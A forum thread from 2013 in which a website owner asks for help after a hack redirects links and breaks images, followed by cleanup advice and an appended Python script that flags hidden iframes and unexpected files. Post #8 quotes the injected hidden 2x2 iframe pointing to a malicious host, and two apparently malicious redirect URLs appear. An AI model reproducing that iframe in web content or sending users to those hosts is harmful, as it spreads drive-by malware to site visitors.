  #1  
Old 02 Jan 2013, 10:55
Traxdata
 
Join Date: Jul 2004
Forum hacked

My forum was hacked for the first time ever:
buttons and images are not showing,
and if I click on links in the forums they redirect me to this site: http://breakthrufundraising . com/ezzi.html
I have deleted all index.html files on the server and rewrote all changed files with the originals.
Still nothing. Any ideas?

PS: Can't login to admincp since if I enter my PW my forum redirects me to the above mentioned website. Nothing can be changed.
I have closed forums via .htaccess

Thanks!

Last edited by Traxdata; 02 Jan 2013 at 14:17.
  #2  
Old 02 Jan 2013, 11:00
ForceHSS
 
Join Date: Apr 2008
Link to site?
  #3  
Old 02 Jan 2013, 11:05
Traxdata
 
Join Date: Jul 2004
Like I mentioned, I have closed the boards via .htaccess to prevent users' passwords (if they log in) from being forwarded.
  #4  
Old 02 Jan 2013, 13:43
ForceHSS
 
Join Date: Apr 2008
So without a link to your site, which would help someone find out what has been installed, how are we to help you fix this problem? All you have here is a post telling us you have a problem, but no way for us to help you.
  #5  
Old 02 Jan 2013, 13:44
Brandon Sheley
 
Join Date: Mar 2005
Real name: Brandon
Why did you give us a live link to the guy "hacking" you?
Can you show us a screenshot of your images and buttons not showing, as you said?
Have you checked the server logs? I'd suggest changing your database info and finding out how you were compromised.
__________________

Email me for website help: brandon[at]sheley[dot]org
  #6  
Old 02 Jan 2013, 14:04
In Omnibus
 
Join Date: Apr 2010
Real name: Kris
Without a link to the site in need of assistance this is more like a spam thread for the link that has been posted.
  #7  
Old 02 Jan 2013, 14:13
doctorsexy
 
Join Date: Apr 2011
Real name: Chris
Watch that link, as it tries to load something.
__________________
http://sandstormradio.org
  #8  
Old 02 Jan 2013, 14:16
Traxdata
 
Join Date: Jul 2004
I have two sites, check this one

- When you click on links you will be redirected to another (above mentioned) website. If you click "show image" you will also be redirected to another website. I talked with my hoster; they said someone had my FTP passwords.
ok, I have replaced all files on darkshine.de but still not a big change!

--------------- Added 02 Jan 2013 at 14:17 ---------------

changed the link

--------------- Added 02 Jan 2013 at 14:18 ---------------

Originally Posted by doctorsexy
Watch that link, as it tries to load something.
changed the link

--------------- Added 02 Jan 2013 at 14:25 ---------------

They added to all my .html files this:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo . com/hzws.html>;</iframe>
Have deleted all the files and replaced with new files - not helped!

Searched for
%base64% %iframe%
in phpmyadmin

nothing suspicious found.

--------------- Added 02 Jan 2013 at 14:28 ---------------

All the pictures from my server are not showing up, either on my sites or in other places I have posted them!
Only if I click on "copy address for image" and paste in url bar I can see them.

Last edited by Traxdata; 02 Jan 2013 at 17:05.
  #9  
Old 02 Jan 2013, 14:40
Simon Lloyd
 
Join Date: Aug 2008
Real name: Simon
My antivirus wouldn't allow your site to load!
__________________
Kind regards,
Simon Microsoft Office Help
My Mods: Find my modifications here
Please do not pm me for support unless i have invited you to!
  #10  
Old 02 Jan 2013, 14:46
Traxdata
 
Join Date: Jul 2004
Yes, a big help, thx!
  #11  
Old 02 Jan 2013, 14:49
In Omnibus
 
Join Date: Apr 2010
Real name: Kris
Are you able to login to the AdminCP directly using admincp/index.php?
  #12  
Old 02 Jan 2013, 14:52
Traxdata
 
Join Date: Jul 2004
no way,
since I have to enter my pw and when I click on continue...redirecting to this stupid website.

have access only with ftp, phpmyadmin or ssh

Like I said, my other website is not a forum, so no database; it has nothing to do with vBulletin, only .html and .jpg files.
I have replaced ALL .html files and some .jpg files but still can't see the pictures and the redirecting is still active. Talked to the hoster: nothing suspicious (malware/trojan) found on the server.

Last edited by Traxdata; 02 Jan 2013 at 14:58.
  #13  
Old 02 Jan 2013, 14:55
In Omnibus
 
Join Date: Apr 2010
Real name: Kris
Are you able to access the AdminCP using tools.php?

--------------- Added 02 Jan 2013 at 14:56 ---------------

The first thing I would do is to replace the index.php file with the default file. You should be able to do that much via FTP.
  #14  
Old 02 Jan 2013, 14:57
Traxdata
 
Join Date: Jul 2004
never tried, do I have to login on tools.php? if so, then no way.

--------------- Added 02 Jan 2013 at 15:11 ---------------

No way, it asks for member# and redirects to another website.
  #15  
Old 02 Jan 2013, 15:41
Simon Lloyd
 
Join Date: Aug 2008
Real name: Simon
It seems to me that one or more of your core files hasn't been overwritten. You will also have a file or two which doesn't belong in your forum root and which is rewriting the infection every time it doesn't see it. My suggestion would be to rename your forum folder, add a new folder, then name it to what your forum folder was, and upload all fresh files (with the install/install.php deleted and the config.php.new edited for your database and renamed to config.php), then try to access. If you can, then you need to search your old folder for files that shouldn't be there, delete them, then upload with overwrite via FTP in ASCII mode your fresh files into the renamed folder, rename the temp folder to something else, and then rename your old folder back to its original and see how you go.
__________________
Kind regards,
Simon Microsoft Office Help
My Mods: Find my modifications here
Please do not pm me for support unless i have invited you to!
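
A sketch of the search described in post #15 (find files in the old folder that are not in a fresh copy, or that differ from it), combined with a check for the tiny iframe quoted in post #8. This is an added example, not code from the thread; the folder names, file names and example.invalid host are constructed assumptions.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# <iframe> whose height or width is 0-5 px, like the height=2 width=2 frame in post #8.
TINY_IFRAME = re.compile(
    r"<iframe\b[^>]*\b(?:height|width)\s*=\s*[\"']?[0-5](?![\d%.])[^>]*>", re.I)
SCAN_EXT = {".html", ".htm", ".php", ".js"}

def file_map(root):
    """Map relative path -> Path for every file under root (dotfiles included)."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): p for p in root.rglob("*") if p.is_file()}

def digest(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def audit(old_root, fresh_root):
    """Compare the renamed (suspect) folder with a fresh copy of the same release."""
    old, fresh = file_map(old_root), file_map(fresh_root)
    report = {"extra": [], "modified": [], "iframe": []}
    for rel, path in sorted(old.items()):
        if rel not in fresh:
            # Review by hand: config.php and uploads are expected here too.
            report["extra"].append(rel)
        elif digest(path) != digest(fresh[rel]):
            report["modified"].append(rel)
        if path.suffix.lower() in SCAN_EXT and TINY_IFRAME.search(
                path.read_text(errors="replace")):
            report["iframe"].append(rel)
    return report

def demo():
    """Audit two constructed trees; file names and example.invalid are made up."""
    with tempfile.TemporaryDirectory() as tmp:
        old, fresh = Path(tmp, "forum_old"), Path(tmp, "forum_fresh")
        clean = "<html><body>index</body></html>"
        bad = clean + ("<iframe name=Twitter height=2 width=2 "
                       "src=http://example.invalid/x.html></iframe>")
        for root, index in ((old, bad), (fresh, clean)):
            root.mkdir()
            (root / "index.html").write_text(index)
            (root / "stock.php").write_text("<?php // unchanged stock file\n")
        (old / "not_in_release.php").write_text("<?php // constructed extra file\n")
        return audit(old, fresh)

if __name__ == "__main__":
    print(demo())
```

Files that legitimately differ from the release (config.php, attachments, line-ending changes from ASCII-mode FTP uploads) also show up in the report and need manual review.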

All times are GMT.